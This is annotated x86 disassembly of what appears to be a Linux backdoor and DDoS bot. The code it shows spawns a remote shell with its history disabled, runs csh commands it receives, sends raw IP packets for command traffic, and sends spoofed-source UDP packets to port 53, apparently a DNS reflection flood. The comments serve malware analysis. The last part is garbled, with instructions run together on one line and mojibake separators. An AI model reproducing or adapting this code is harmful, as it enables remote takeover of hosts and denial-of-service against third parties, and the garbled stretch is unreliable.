        push 2
        mov edx, [ebp+clientfd]
        push edx
        call dup2                       ; dup2(clientfd, 2)
        push 1
        push offset aSbinBinUsrSbin     ; "/sbin:/bin:/usr/sbin:/usr/bin:/usr/loca"...
        push offset aPath               ; "PATH"
        call setenv
        add esp, 24h
        push offset aHistfile           ; "HISTFILE"
        call unsetenv
        push 1
        push offset aLinux              ; "linux"
        push offset aTerm               ; "TERM"
        call setenv
        push 0
        push offset aSh                 ; "sh"
        push offset aBinSh              ; "/bin/sh"
        call execl                      ; execl("/bin/sh", "sh", 0)
        mov ecx, [ebp+clientfd]         ; reached only if execl returns
        push ecx
        call close
        add esp, 20h
        push 0
        call exit

loc_8048AC4:                            ; CODE XREF: main+875j
        push 0
        call exit
        nop

; case0x6 - run a command string without returning output.  Same fork /
; setsid / fork structure as case0x2, but the intermediate process waits
; 4B0h seconds before kill(dword_807E770, 9), and the command line is
; "/bin/csh -f -c \"%s\" " with no redirection to a file.

case0x6:                                ; CODE XREF: main+1F1j
                                        ; DATA XREF: main+210o
        call fork                       ; case 0x6
        mov ds:dword_807E770, eax
        test eax, eax
        jnz loc_8048EB8                 ; default
        call setsid
        push 1
        push 11h
        call signal                     ; signal(11h, 1), as elsewhere in main
        call fork
        add esp, 8
        test eax, eax
        jz short loc_8048B18
        push 4B0h
        call sleep
        push 9
        mov eax, ds:dword_807E770
        push eax
        call kill
        push 0
        call exit
        lea esi, [esi]

loc_8048B18:                            ; CODE XREF: main+9C2j
        xor ebx, ebx
        lea esi, [esi]

loc_8048B1C:                            ; CODE XREF: main+9FDj
        ; cmdbuf[i] = cmdbuf[i + 2] for i = 0..18Dh
        mov al, [ebx+ebp-0FFEh]
        mov [ebx+ebp-1000h], al
        inc ebx
        cmp ebx, 18Dh
        jle short loc_8048B1C
        mov edx, [ebp+ptr_cmdbuf]
        push edx
        push offset aBinCshFCS          ; "/bin/csh -f -c \"%s\" "
        lea ebx, [ebp+tmpbuf]
        push ebx
        call sprintf
        push ebx
        call system
        push 0
        call _exit

; case0x7 - stop the current worker: if child_pid is non-zero, send it
; signal 9 and clear child_pid.

case0x7:                                ; CODE XREF: main+1F1j
                                        ; DATA XREF: main+214o
        mov eax, ds:child_pid           ; case 0x7
        test eax, eax
        jz loc_8048EB8                  ; default
        push 9
        push eax
        call kill
        mov ds:child_pid, 0
        add esp, 8
        jmp loc_8048EB8                 ; default

; -------------------------------------------------------------------------
        align 4

; case0x8 - like case0x3 but with dword_807E778 = 9, the buffer shifted by
; 0Ah bytes, and cmdbuf[6] passed as the fifth argument of sub_8049174
; instead of the constant 0 (arguments are cmdbuf[2]..cmdbuf[9], var_44BC).

case0x8:                                ; CODE XREF: main+1F1j
                                        ; DATA XREF: main+218o
        cmp ds:child_pid, 0             ; case 0x8
        jnz loc_8048EB8                 ; default
        mov ds:dword_807E778, 9
        call fork
        mov ds:child_pid, eax
        test eax, eax
        jnz loc_8048EB8                 ; default
        lea edi, [ebp+var_44BC]
        lea esi, [ebp+cmdbuf]
        cld
        mov ecx, 3Fh
        repe movsd
        movsw
        movsb
        xor ebx, ebx
        lea esi, [esi]

loc_8048BC4:                            ; CODE XREF: main+AA5j
        mov al, [ebx+ebp-44B2h]         ; var_44BC + 0Ah + ebx
        mov [ebx+ebp-44BCh], al
        inc ebx
        cmp ebx, 0FEh
        jle short loc_8048BC4
        lea eax, [ebp+var_44BC]
        push eax
        movzx eax, [ebp+cmdbuf+9]
        push eax
        movzx eax, [ebp+cmdbuf+8]
        push eax
        movzx eax, [ebp+cmdbuf+7]
        push eax
        movzx eax, [ebp+cmdbuf+6]
        push eax
        movzx eax, [ebp+cmdbuf+5]
        push eax
        movzx eax, [ebp+cmdbuf+4]
        push eax
        movzx eax, [ebp+cmdbuf+3]
        push eax
        movzx eax, [ebp+cmdbuf+2]
        push eax
        call sub_8049174
        add esp, 24h
        push 0
        call _exit
        db 8Dh,76h,0                    ; lea esi, [esi+0]

; case0x9 - worker with dword_807E778 = 0Ah; buffer shifted by 0Eh bytes;
; calls sub_8049D40 with cmdbuf[2]..cmdbuf[0Ch], a constant 0, cmdbuf[0Dh]
; and var_44BC (14 arguments).  sub_8049D40 is not part of this excerpt.

case0x9:                                ; CODE XREF: main+1F1j
                                        ; DATA XREF: main+21Co
        cmp ds:child_pid, 0             ; case 0x9
        jnz loc_8048EB8                 ; default
        mov ds:dword_807E778, 0Ah
        call fork
        mov ds:child_pid, eax
        test eax, eax
        jnz loc_8048EB8                 ; default
        lea edi, [ebp+var_44BC]
        lea esi, [ebp+cmdbuf]
        cld
        mov ecx, 3Fh
        repe movsd
        movsw
        movsb
        xor ebx, ebx
        lea esi, [esi]

loc_8048C78:                            ; CODE XREF: main+B59j
        mov al, [ebx+ebp-44AEh]         ; var_44BC + 0Eh + ebx
        mov [ebx+ebp-44BCh], al
        inc ebx
        cmp ebx, 0FEh
        jle short loc_8048C78
        lea eax, [ebp+var_44BC]
        push eax
        movzx eax, [ebp+cmdbuf+0Dh]
        push eax
        push 0
        movzx eax, [ebp+cmdbuf+0Ch]
        push eax
        movzx eax, [ebp+cmdbuf+0Bh]
        push eax
        movzx eax, [ebp+cmdbuf+0Ah]
        push eax
        movzx eax, [ebp+cmdbuf+9]
        push eax
        movzx eax, [ebp+cmdbuf+8]
        push eax
        movzx eax, [ebp+cmdbuf+7]
        push eax
        movzx eax, [ebp+cmdbuf+6]
        push eax
        movzx eax, [ebp+cmdbuf+5]
        push eax
        movzx eax, [ebp+cmdbuf+4]
        push eax
        movzx eax, [ebp+cmdbuf+3]
        push eax
        movzx eax, [ebp+cmdbuf+2]
        push eax
        call sub_8049D40
        add esp, 38h
        push 0
        call _exit
        nop

; case0xa - worker with dword_807E778 = 0Bh; buffer shifted by 0Fh bytes;
; calls sub_8049D40 with cmdbuf[2]..cmdbuf[0Eh] and var_44BC (14 arguments).

case0xa:                                ; CODE XREF: main+1F1j
                                        ; DATA XREF: main+220o
        cmp ds:child_pid, 0             ; case 0xa
        jnz loc_8048EB8                 ; default
        mov ds:dword_807E778, 0Bh
        call fork
        mov ds:child_pid, eax
        test eax, eax
        jnz loc_8048EB8                 ; default
        lea edi, [ebp+var_44BC]
        lea esi, [ebp+cmdbuf]
        cld
        mov ecx, 3Fh
        repe movsd
        movsw
        movsb
        xor ebx, ebx
        lea esi, [esi]

loc_8048D4C:                            ; CODE XREF: main+C2Dj
        mov al, [ebx+ebp-44ADh]         ; var_44BC + 0Fh + ebx
        mov [ebx+ebp-44BCh], al
        inc ebx
        cmp ebx, 0FEh
        jle short loc_8048D4C
        lea eax, [ebp+var_44BC]
        push eax
        movzx eax, [ebp+cmdbuf+0Eh]
        push eax
        movzx eax, [ebp+cmdbuf+0Dh]
        push eax
        movzx eax, [ebp+cmdbuf+0Ch]
        push eax
        movzx eax, [ebp+cmdbuf+0Bh]
        push eax
        movzx eax, [ebp+cmdbuf+0Ah]
        push eax
        movzx eax, [ebp+cmdbuf+9]
        push eax
        movzx eax, [ebp+cmdbuf+8]
        push eax
        movzx eax, [ebp+cmdbuf+7]
        push eax
        movzx eax, [ebp+cmdbuf+6]
        push eax
        movzx eax, [ebp+cmdbuf+5]
        push eax
        movzx eax, [ebp+cmdbuf+4]
        push eax
        movzx eax, [ebp+cmdbuf+3]
        push eax
        movzx eax, [ebp+cmdbuf+2]
        push eax
        call sub_8049D40
        add esp, 38h
        push 0
        call _exit
        db 8Dh,76h,0                    ; lea esi, [esi+0]

; case0xb - worker with dword_807E778 = 0Ch; buffer shifted by 0Eh bytes;
; calls sub_8049564 with cmdbuf[2]..cmdbuf[0Dh] and var_44BC (13 arguments).
; sub_8049564 is not part of this excerpt.

case0xb:                                ; CODE XREF: main+1F1j
                                        ; DATA XREF: main+224o
        cmp ds:child_pid, 0             ; case 0xb
        jnz loc_8048EB8                 ; default
        mov ds:dword_807E778, 0Ch
        call fork
        mov ds:child_pid, eax
        test eax, eax
        jnz loc_8048EB8                 ; default
        lea edi, [ebp+var_44BC]
        lea esi, [ebp+cmdbuf]
        cld
        mov ecx, 3Fh
        repe movsd
        movsw
        movsb
        xor ebx, ebx
        lea esi, [esi]

loc_8048E28:                            ; CODE XREF: main+D09j
        mov al, [ebx+ebp-44AEh]         ; var_44BC + 0Eh + ebx
        mov [ebx+ebp-44BCh], al
        inc ebx
        cmp ebx, 0FEh
        jle short loc_8048E28
        lea eax, [ebp+var_44BC]
        push eax
        movzx eax, [ebp+cmdbuf+0Dh]
        push eax
        movzx eax, [ebp+cmdbuf+0Ch]
        push eax
        movzx eax, [ebp+cmdbuf+0Bh]
        push eax
        movzx eax, [ebp+cmdbuf+0Ah]
        push eax
        movzx eax, [ebp+cmdbuf+9]
        push eax
        movzx eax, [ebp+cmdbuf+8]
        push eax
        movzx eax, [ebp+cmdbuf+7]
        push eax
        movzx eax, [ebp+cmdbuf+6]
        push eax
        movzx eax, [ebp+cmdbuf+5]
        push eax
        movzx eax, [ebp+cmdbuf+4]
        push eax
        movzx eax, [ebp+cmdbuf+3]
        push eax
        movzx eax, [ebp+cmdbuf+2]
        push eax
        call sub_8049564
        add esp, 34h
        push 0
        call _exit
        db 8Dh,76h,0                    ; lea esi, [esi+0]

loc_8048EB8:                            ; CODE XREF: main+1A5j main+1B4j ...
        push 2710h                      ; default
        call usleep                     ; usleep(2710h) between receive attempts
        add esp, 4
        jmp process_command_packet
main endp

; -------------------------------------------------------------------------
        db 8Dh ;
        db 36h ; 6

; ======================= S U B R O U T I N E =============================
; Attributes: bp-based frame hidden
; broadcast_packet(address_list, data, datalen)
; Sends data through send_packet, always with dataptr as the source-address
; argument.  When cmdbuffbyte1 is 0 a single packet goes to the first
; address in address_list.  Otherwise one packet is sent to each of the ten
; 4-byte entries (address_list .. address_list+36), with usleep(0FA0h)
; before each.  Always returns 1; send_packet's result is ignored.

broadcast_packet proc near              ; CODE XREF: main+2AFp main+5ABp

var_C = byte ptr -0Ch
address_list = dword ptr 8
data = dword ptr 0Ch
datalen = dword ptr 10h

        push ebp
        mov ebp, esp
        push edi
        push esi
        push ebx
        mov eax, [ebp+address_list]
        mov edi, [ebp+datalen]
        cmp ds:cmdbuffbyte1, 0
        jz short loc_8048F10
        mov ebx, eax                    ; ebx = current entry
        lea esi, [ebx+36]               ; esi = last entry
        lea esi, [esi]

loc_8048EE8:                            ; CODE XREF: broadcast_packet+3Ej
        push 0FA0h
        call usleep
        push edi
        mov edx, [ebp+data]
        push edx
        push ebx
        push offset dataptr
        call send_packet                ; send_packet(&dataptr, entry, data, datalen)
        add esp, 14h
        add ebx, 4
        cmp ebx, esi
        jle short loc_8048EE8
        jmp short loc_8048F20

; -------------------------------------------------------------------------
        db 8Dh, 36h
; -------------------------------------------------------------------------

loc_8048F10:                            ; CODE XREF: broadcast_packet+13j
        push edi
        mov edx, [ebp+data]
        push edx
        push eax
        push offset dataptr
        call send_packet                ; send_packet(&dataptr, address_list, data, datalen)

loc_8048F20:                            ; CODE XREF: broadcast_packet+40j
        mov eax, 1
        lea esp, [ebp+var_C]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
broadcast_packet endp

; -------------------------------------------------------------------------
        align 4

; ======================= S U B R O U T I N E =============================
; Attributes: bp-based frame hidden
; sub_8048F30(arg_0 = buffer, arg_4 = length in bytes)
; Sums the buffer as 16-bit words, adds a trailing odd byte if present, folds
; the upper 16 bits into the lower 16 twice, and returns the complemented
; low 16 bits - the same fold-and-complement sequence send_packet inlines for
; the IP header checksum.  No cross-reference to it appears in this excerpt.

sub_8048F30 proc near

var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch

        push ebp
        mov ebp, esp
        sub esp, 4
        push ebx
        mov edx, [ebp+arg_4]            ; edx = bytes remaining
        mov ebx, [ebp+arg_0]            ; ebx = read pointer
        xor ecx, ecx                    ; ecx = running sum
        mov [ebp+var_2], 0
        cmp edx, 1
        jle short loc_8048F5C
        lea esi, [esi]

loc_8048F4C:                            ; CODE XREF: sub_8048F30+2Aj
        movzx eax, word ptr [ebx]
        add ecx, eax
        add ebx, 2
        add edx, 0FFFFFFFEh             ; edx -= 2
        cmp edx, 1
        jg short loc_8048F4C

loc_8048F5C:                            ; CODE XREF: sub_8048F30+18j
        cmp edx, 1
        jnz short loc_8048F6C
        mov al, [ebx]                   ; odd trailing byte
        mov byte ptr [ebp+var_2], al
        movzx eax, [ebp+var_2]
        add ecx, eax

loc_8048F6C:                            ; CODE XREF: sub_8048F30+2Fj
        mov edx, ecx
        sar edx, 10h
        movzx eax, cx
        lea ecx, [eax+edx]              ; fold the high half into the low half
        mov eax, ecx
        sar eax, 10h
        add ecx, eax                    ; fold the remaining carry
        mov eax, ecx
        not ax
        mov [ebp+var_2], ax
        and eax, 0FFFFh
        mov ebx, [ebp+var_8]
        mov esp, ebp
        pop ebp
        retn
sub_8048F30 endp

; -------------------------------------------------------------------------
        align 4

; ======================= S U B R O U T I N E =============================
; Attributes: bp-based frame hidden
; send_packet(srcaddr, dstaddr, out, outlen)
; Builds one raw IP packet in a malloc'ed buffer of outlen + 17h bytes and
; sends it with sendto on a freshly opened raw socket (protocol 0FFh).
; Header fields written below: version/IHL byte 45h, TOS 0, total length
; outlen + 16h, random id, fragment offset 0, TTL 0FAh, protocol 0Bh,
; source and destination copied byte-wise from srcaddr and dstaddr, and a
; header checksum over 14h bytes.  The byte at offset 14h is set to 3, the
; byte at offset 15h is never written, and out is copied to offset 16h.
; Returns 1 on success and 0 on failure.
; Resource handling as written: the socket is not closed when malloc fails
; or when sendto returns -1.

send_packet proc near                   ; CODE XREF: broadcast_packet+31p
                                        ; broadcast_packet+4Fp

var_50 = byte ptr -50h
sockfd = dword ptr -44h
datahdr = dword ptr -40h
iphdr = dword ptr -3Ch
data = dword ptr -38h
var_32 = word ptr -32h
tmpbuf = byte ptr -30h
addr = byte ptr -10h
srcaddr = dword ptr 8
dstaddr = dword ptr 0Ch
out = dword ptr 10h
outlen = dword ptr 14h

        push ebp
        mov ebp, esp
        sub esp, 44h
        push edi
        push esi
        push ebx
        mov ebx, [ebp+dstaddr]
        push 0FFh                       ; proto = FF
        push 3                          ; raw
        push 2                          ; inet
        call socket                     ; socket(PF_INET, SOCK_RAW, 0xFF)
        mov [ebp+sockfd], eax
        add esp, 0Ch
        cmp eax, 0FFFFFFFFh
        jz short loc_8048FCE
        mov eax, [ebp+outlen]
        add eax, 17h
        push eax
        call malloc                     ; malloc(outlen + 23)
        mov esi, eax
        add esp, 4
        test esi, esi
        jnz short loc_8048FD8

loc_8048FCE:                            ; CODE XREF: send_packet+23j
        xor eax, eax                    ; return 0
        jmp loc_804912C

; -------------------------------------------------------------------------
        db 8Dh, 76h, 0
; -------------------------------------------------------------------------

loc_8048FD8:                            ; CODE XREF: send_packet+38j
        mov [ebp+iphdr], esi
        lea edi, [esi+14h]
        mov [ebp+datahdr], edi          ; datahdr = buffer + 14h
        lea edi, [esi+16h]
        mov [ebp+data], edi             ; data = buffer + 16h
        mov edi, [ebp+srcaddr]
        mov al, [edi]
        mov [esi+0Ch], al               ; source address bytes 0..3
        mov al, [edi+1]
        mov [esi+0Dh], al
        mov al, [edi+2]
        mov [esi+0Eh], al
        mov al, [edi+3]
        mov [esi+0Fh], al
        mov al, [ebx]
        mov [esi+10h], al               ; destination address bytes 0..3
        mov al, [ebx+1]
        mov [esi+11h], al
        mov al, [ebx+2]
        mov [esi+12h], al
        mov al, [ebx+3]
        mov [esi+13h], al
        movzx eax, byte ptr [ebx+3]
        push eax
        movzx eax, byte ptr [ebx+2]
        push eax
        movzx eax, byte ptr [ebx+1]
        push eax
        movzx eax, byte ptr [ebx]
        push eax
        push offset aD_D_D_D            ; "%d.%d.%d.%d"
        lea ebx, [ebp+tmpbuf]
        push ebx
        call sprintf                    ; dotted-quad text of dstaddr in tmpbuf
        push ebx
        call get_haddr
        mov dword ptr [ebp+addr+4], eax ; sockaddr_in.sin_addr.s_addr = get_haddr(buf)
        mov word ptr [ebp+addr+2], 0Ah  ; sockaddr_in.sin_port = 0x0A
        mov word ptr [ebp+addr], 2      ; sockaddr_in.sin_family = AF_INET
        mov byte ptr [esi], 45h         ; iphdr.version = 0x45
        mov byte ptr [esi+8], 0FAh      ; iphdr.ttl = 0xFA
        mov byte ptr [esi+9], 0Bh       ; iphdr.protocol = 0x0B
        add esp, 1Ch
        mov ax, word ptr [ebp+outlen]
        add ax, 16h
        xchg al, ah                     ; byte swap to network order
        mov [esi+2], ax                 ; iphdr.tot_len = outlen + 0x16
        mov byte ptr [esi+1], 0         ; iphdr.tos = 0
        call random
        xchg al, ah
        mov [esi+4], ax                 ; iphdr.id = random()
        mov word ptr [esi+6], 0         ; iphdr.frag_off = 0
        mov word ptr [esi+0Ah], 0       ; iphdr.check = 0
        mov edx, 14h                    ; sizeof(iphdr)
        mov ecx, esi
        xor ebx, ebx                    ; ebx = running checksum sum
        mov [ebp+var_32], 0

loc_8049094:                            ; CODE XREF: send_packet+10Ej
        movzx eax, word ptr [ecx]
        add ebx, eax
        add ecx, 2                      ; ecx += 2
        add edx, 0FFFFFFFEh             ; edx -= 2
        cmp edx, 1
        jg short loc_8049094            ; if (edx > 1)
        jnz short loc_80490B1           ; if (edx != 1)
        mov al, [ecx]
        mov byte ptr [ebp+var_32], al
        movzx eax, [ebp+var_32]
        add ebx, eax

loc_80490B1:                            ; CODE XREF: send_packet+110j
        mov edx, ebx
        sar edx, 10h
        movzx eax, bx
        lea ebx, [eax+edx]
        mov eax, ebx
        sar eax, 10h
        add ebx, eax
        mov eax, ebx
        not ax
        mov [ebp+var_32], ax
        mov edi, [ebp+iphdr]
        mov [edi+0Ah], ax               ; store the header checksum
        mov edi, [ebp+datahdr]
        mov byte ptr [edi], 3           ; outgoing marker; received packets must carry 2 here
        mov edi, [ebp+outlen]
        push edi                        ; outlen
        mov edi, [ebp+out]
        push edi                        ; out
        mov edi, [ebp+data]
        push edi                        ; data
        call memcpy                     ; memcpy(data, out, outlen)
        add esp, 0Ch
        push 10h                        ; sizeof(addr)
        lea eax, [ebp+addr]
        push eax                        ; &addr
        push 0                          ; 0
        mov eax, [ebp+outlen]
        add eax, 16h
        push eax                        ; outlen + 16h (IP header plus the 2-byte data header)
        push esi                        ; iphdr
        mov edi, [ebp+sockfd]
        push edi
        call sendto                     ; sendto(sockfd, iphdr, outlen + 0x16, 0, &addr, sizeof(addr))
        add esp, 18h
        cmp eax, 0FFFFFFFFh
        jnz short loc_8049118
        push esi
        call free                       ; free(iphdr)
        xor eax, eax                    ; return 0
        jmp short loc_804912C

; -------------------------------------------------------------------------

loc_8049118:                            ; CODE XREF: send_packet+178j
        mov edi, [ebp+sockfd]
        push edi
        call close                      ; close(sockfd)
        push esi
        call free                       ; free(iphdr)
        mov eax, 1                      ; return 1

loc_804912C:                            ; CODE XREF: send_packet+3Cj
                                        ; send_packet+182j
        lea esp, [ebp+var_50]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
send_packet endp

; -------------------------------------------------------------------------
        db 8Dh, 36h

; ======================= S U B R O U T I N E =============================
; Attributes: bp-based frame hidden
; get_haddr(arg_0 = host string)
; Calls gethostbyname(arg_0).  On failure returns 0.  Otherwise copies
; [result+0Ch] bytes from the first pointer in the list at [result+10h] into
; the global dword_80792BC and returns that dword.  The offsets presumably
; correspond to hostent.h_length and hostent.h_addr_list - confirm against
; the target libc.  The copy length is taken from the result without a bound.

get_haddr proc near                     ; CODE XREF: send_packet+A6p

arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        mov eax, [ebp+arg_0]
        push eax
        call gethostbyname
        mov ecx, eax
        add esp, 4
        test ecx, ecx
        jz short loc_804916C
        mov eax, [ecx+10h]
        mov edx, [eax]
        mov eax, [ecx+0Ch]
        push eax
        push edx
        push offset dword_80792BC
        call memcpy
        mov eax, ds:dword_80792BC
        mov esp, ebp
        pop ebp
        retn

; -------------------------------------------------------------------------
        db 8Dh, 36h
; -------------------------------------------------------------------------

loc_804916C:                            ; CODE XREF: get_haddr+13j
        xor eax, eax
        mov esp, ebp
        pop ebp
        retn
get_haddr endp

; -------------------------------------------------------------------------
        db 8Dh, 36h

; ======================= S U B R O U T I N E =============================
; Attributes: bp-based frame hidden
; sub_8049174 - called from case0x3 and case0x8 in main.  Only the start of
; the routine is reproduced in this span; the body continues below.

sub_8049174 proc near                   ; CODE XREF: main+684p main+AEEp

saved_regs = dword ptr -680h
ptr_buffer = dword ptr -674h
offset = dword ptr -670h
destip = dword ptr -66Ch
lookup_counter = dword ptr -668h
lookup_stepper = dword ptr -664h
payload = dword ptr -660h
udphdr = dword ptr -65Ch
sockfd = dword ptr -658h
randomize_start = dword ptr -654h
save_d = dword ptr -650h
save_c = dword ptr -64Ch
save_b = dword ptr -648h
save_a = dword ptr -644h
checksum = word ptr -63Eh
ipaddr = dword ptr -63Ch
buffer = byte ptr -638h
dstaddr = byte ptr -228h
payloads = dword ptr -218h
lengths = dword ptr -24h
srcaddr_a = dword ptr 8
srcaddr_b = dword ptr 0Ch
srcaddr_c = dword ptr 10h
srcaddr_d = dword ptr 14h
lookup_step = dword ptr 18h
srcport_hi = dword ptr 1Ch
srcport_lo = dword ptr 20h
use_srchost = dword ptr 24h
srchost = dword ptr 28h

        push ebp                        ; initialize stack & preserve registers
        mov ebp, esp                    ; |
        sub esp, 674h                   ; |
        push edi                        ; |
        push esi                        ; |
        push ebx                        ; v
        mov bl, byte ptr [ebp+srcaddr_a]
        mov byte ptr [ebp+save_a], bl   ; save_a = a
        mov bl, byte ptr [ebp+srcaddr_b]
        mov byte ptr [ebp+save_b], bl
; save_b = b mov bl, byte ptr [ebp+srcaddr_c] mov byte ptr [ebp+save_c], bl ; save_c = c mov bl, byte ptr [ebp+srcaddr_d] mov byte ptr [ebp+save_d], bl ; save_d = d lea edi, [ebp+lengths] mov esi, offset length_table cld mov ecx, 9 repe movsd ; memcpy(var_24, length_table, 36) mov [ebp+randomize_start], 1 lea edi, [ebp+payloads] mov esi, offset payload_table cld mov ecx, 7Dh repe movsd ; memcpy(var_218, payload_table, 500) lea esi, [ebp+buffer] ; iphdr = (struct iphdr *)buffer lea ebx, [ebp+buffer+14h] mov [ebp+udphdr], ebx ; udphdr = (struct udphdr *)(buffer + sizeof(struct iphdr)) lea ebx, [ebp+buffer+1Ch] mov [ebp+payload], ebx ; payload = buffer + sizeof(struct iphdr) + sizeof(struct udphdr) mov word ptr [ebp+dstaddr], 2 ; dstaddr.sin_family = AF_INET mov word ptr [ebp+dstaddr+2], 0 ; dstaddr.sin_port = 0 cmp [ebp+lookup_step], 0 ; if (!e) jz short loc_804920A dec [ebp+lookup_step] ; e-- loc_804920A: ; CODE XREF: sub_8049174+91j push 0FFh ; *reserved* push 3 ; SOCK_RAW push 2 ; PF_INET call socket ; socket(PF_INET, SOCK_RAW, 0xFF) mov [ebp+sockfd], eax add esp, 0Ch test eax, eax ; if (!sockfd) jle bail_out ; { child_pid = 0; return 0; } mov [ebp+lookup_stepper], 0 ; var_664 = 0 mov [ebp+lookup_counter], 0 ; var_668 = 0 push 400h push 0 push esi call memset ; memset(buffer, 0, sizeof(buffer)) /* sizeof(buffer) == 1024 */ add esp, 0Ch db 8Dh,76h,0 ; lea esi, [esi+0] outer_loop: ; CODE XREF: sub_8049174+140j ; sub_8049174+3CDj xor edi, edi cmp [ebp+use_srchost], 0 jz short loc_80492B2 cmp [ebp+lookup_counter], 0 jg short loc_80492B2 mov ebx, [ebp+srchost] push ebx call gethostbyname mov edx, eax add esp, 4 test edx, edx jnz short loc_8049288 push 258h call sleep mov edi, 1 add esp, 4 jmp short loc_80492B2 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8049288: ; CODE XREF: sub_8049174+FDj push 4 lea eax, [ebp+ipaddr] push eax mov eax, [edx+10h] mov eax, [eax] push eax call bcopy mov eax, [ebp+ipaddr] mov [esi+0Ch], eax mov [ebp+lookup_counter], 9C40h add esp, 
0Ch loc_80492B2: ; CODE XREF: sub_8049174+E2j ; sub_8049174+EBj ... test edi, edi jnz short outer_loop xor edi, edi mov [ebp+offset], 0 lea esi, [esi] inner_loop: ; CODE XREF: sub_8049174+3C7j cmp [ebp+randomize_start], 1 jnz short loc_80492E8 mov [ebp+randomize_start], 0 call __random mov ebx, 8000 cdq idiv ebx jmp short loc_80492EA ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh ; db 36h ; 6 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80492E8: ; CODE XREF: sub_8049174+157j xor edx, edx loc_80492EA: ; CODE XREF: sub_8049174+170j cmp iptable[edx*4], 0 jz loc_8049530 lea edx, ds:806D22Ch[edx*4] mov [ebp+destip], edx db 8Dh,76h,0 ; lea esi, [esi+0] loc_8049308: ; CODE XREF: sub_8049174+3B6j mov ebx, [ebp+destip] mov eax, [ebx] mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr = *var_66C mov ebx, [ebp+offset] lea edx, [ebp+ebx+payloads] mov eax, [ebp+edi*4+lengths] push eax ; var_24 + edi * 4 push edx ; var_218 + var_670 mov ebx, [ebp+payload] push ebx ; payload call memcpy ; memcpy(payload, var_218 + var_670, var_24 + edi * 4) add esp, 0Ch call __random mov ebx, 255 cdq idiv ebx mov ebx, [ebp+payload] mov [ebx], dl ; payload[0] = random() % 255 call __random mov ebx, 255 cdq idiv ebx mov ebx, [ebp+payload] mov [ebx+1], dl ; payload[1] = random() % 255 cmp [ebp+srcport_hi], 0 jnz short loc_8049380 cmp [ebp+srcport_lo], 0 jnz short loc_8049380 call __random mov ebx, 30000 cdq idiv ebx mov eax, edx jmp short loc_804938A ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8049380: ; CODE XREF: sub_8049174+1F3j ; sub_8049174+1F9j mov eax, [ebp+srcport_hi] shl eax, 8 add ax, word ptr [ebp+srcport_lo] loc_804938A: ; CODE XREF: sub_8049174+20Aj xchg al, ah mov ebx, [ebp+udphdr] ; udphdr->source mov [ebx], ax mov ebx, [ebp+udphdr] ; udphdr->dest mov word ptr [ebx+2], 3500h mov ax, word ptr [ebp+edi*4+lengths] add ax, 8 xchg al, ah mov [ebx+4], ax ; udphdr->len mov word ptr [ebx+6], 0 ; udphdr->check cmp [ebp+use_srchost], 0 jnz short loc_80493EC mov bl, byte ptr 
[ebp+save_a] mov [ebp+buffer+0Ch], bl mov bl, byte ptr [ebp+save_b] mov [ebp+buffer+0Dh], bl mov bl, byte ptr [ebp+save_c] mov [ebp+buffer+0Eh], bl mov bl, byte ptr [ebp+save_d] mov [ebp+buffer+0Fh], bl loc_80493EC: ; CODE XREF: sub_8049174+246j mov ebx, [ebp+destip] mov eax, [ebx] mov [esi+10h], eax mov byte ptr [esi], 45h call __random mov ebx, 130 cdq idiv ebx add dl, 120 mov [esi+8], dl call __random mov ebx, 255 cdq idiv ebx mov [esi+4], dx mov byte ptr [esi+9], 11h mov word ptr [esi+6], 0 mov ax, word ptr [ebp+edi*4+lengths] add ax, 1Ch xchg al, ah mov [esi+2], ax mov word ptr [esi+0Ah], 0 mov edx, 14h lea ebx, [ebp+buffer] mov [ebp+ptr_buffer], ebx xor ecx, ecx mov [ebp+checksum], 0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804945C: ; CODE XREF: sub_8049174+302j mov ebx, [ebp+ptr_buffer] movzx eax, word ptr [ebx] add ecx, eax add ebx, 2 mov [ebp+ptr_buffer], ebx add edx, 0FFFFFFFEh cmp edx, 1 jg short loc_804945C jnz short loc_804948B mov al, [ebx] mov byte ptr [ebp+checksum], al movzx eax, [ebp+checksum] add ecx, eax loc_804948B: ; CODE XREF: sub_8049174+304j mov edx, ecx sar edx, 10h movzx eax, cx lea ecx, [eax+edx] mov eax, ecx sar eax, 10h add ecx, eax mov eax, ecx not ax mov [ebp+checksum], ax mov [esi+0Ah], ax push 10h ; sizeof(dstaddr) lea eax, [ebp+dstaddr] push eax ; &dstaddr push 0 ; 0 mov eax, [ebp+edi*4+lengths] add eax, 1Ch push eax ; var_24 + edi * 4 + sizeof(struct iphdr) + sizeof(struct udphdr) lea eax, [ebp+buffer] push eax ; buffer mov ebx, [ebp+sockfd] push ebx ; sockfd call sendto ; sendto(sockfd, buffer, var_24 + edi * 4 + 0x1C, &dstaddr, sizeof(dstaddr)) add esp, 18h cmp [ebp+lookup_step], 0 jnz short loc_80494E8 push 300 call usleep ; usleep(300) jmp short loc_8049507 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80494E8: ; CODE XREF: sub_8049174+366j mov ebx, [ebp+lookup_step] cmp [ebp+lookup_stepper], ebx jnz short loc_8049514 push 300 call usleep ; usleep(300) mov [ebp+lookup_stepper], 0 loc_8049507: ; CODE XREF: sub_8049174+372j dec 
[ebp+lookup_counter] ; operand of the `dec` that ends the previous line (tail of sub_8049174, which begins above this excerpt)
        add esp, 4
        jmp short loc_804951A
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_8049514: ; CODE XREF: sub_8049174+37Dj
        inc [ebp+lookup_stepper]
loc_804951A: ; CODE XREF: sub_8049174+39Cj
        add [ebp+destip], 4
